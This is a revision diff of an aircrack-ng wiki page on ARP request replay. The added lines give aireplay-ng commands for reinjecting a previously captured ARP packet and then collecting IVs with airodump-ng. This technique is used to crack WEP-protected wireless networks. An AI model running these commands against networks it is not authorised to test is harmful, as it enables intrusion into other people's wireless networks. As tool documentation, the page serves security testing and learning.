User Tools

Site Tools


arp-request_reinjection

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
Next revisionBoth sides next revision
arp-request_reinjection [2007/11/08 22:40] – reformat troubleshooting and added more. darkaudaxarp-request_reinjection [2009/08/14 19:20] – use dokuwiki internal link mister_x
Line 27: Line 27:
   *ath0 is the wireless interface name\\   *ath0 is the wireless interface name\\
  
-Replaying a previous arp replay.  This is a special case of the [[interactive_packet_replay|interactive packet replay attack]].  It is presented here since it is complementary to the ARP request replay attack.+There are two methods of replaying an ARP which was previously injected.  The first and simplest method is to use the same command plus the "-r" to read the output file from your last successful ARP replay. 
 + 
 +   aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0 
 + 
 +Where:\\ 
 +  *-3 means standard arp request replay\\ 
 +  *-b 00:13:10:30:24:9C is the access point MAC address\\ 
 +  *-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)\\ 
 +  *-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay\\ 
 +  *ath0 is the wireless interface name\\ 
 + 
 +The second method is a special case of the [[interactive_packet_replay|interactive packet replay attack]].  It is presented here since it is complementary to the ARP request replay attack.
  
    aireplay-ng -2 -r replay_arp-0219-115508.cap ath0    aireplay-ng -2 -r replay_arp-0219-115508.cap ath0
Line 87: Line 98:
        
    Sent 3181 packets...    Sent 3181 packets...
 +
 +As well, you can alternatively use per the Usage Section above:
 +
 +   aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0
  
 At this point, if you have not already done so, start [[airodump-ng]] to capture the IVs being generated.  The data count should be increasing rapidly. At this point, if you have not already done so, start [[airodump-ng]] to capture the IVs being generated.  The data count should be increasing rapidly.
Line 97: Line 112:
  
 ==== I am injecting but the IVs don't increase! ==== ==== I am injecting but the IVs don't increase! ====
-See [[http://aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase|Tutorial: I am injecting but the IVs don't increase!]]+See [[i_am_injecting_but_the_ivs_don_t_increase|Tutorial: I am injecting but the IVs don't increase!]]
  
 ==== I get 'Read XXXXX packets (got 0 ARP requests), sent 0 packets...(0 pps)' - Why it doesn't send any packets? ==== ==== I get 'Read XXXXX packets (got 0 ARP requests), sent 0 packets...(0 pps)' - Why it doesn't send any packets? ====
arp-request_reinjection.txt · Last modified: 2010/11/21 16:08 by sleek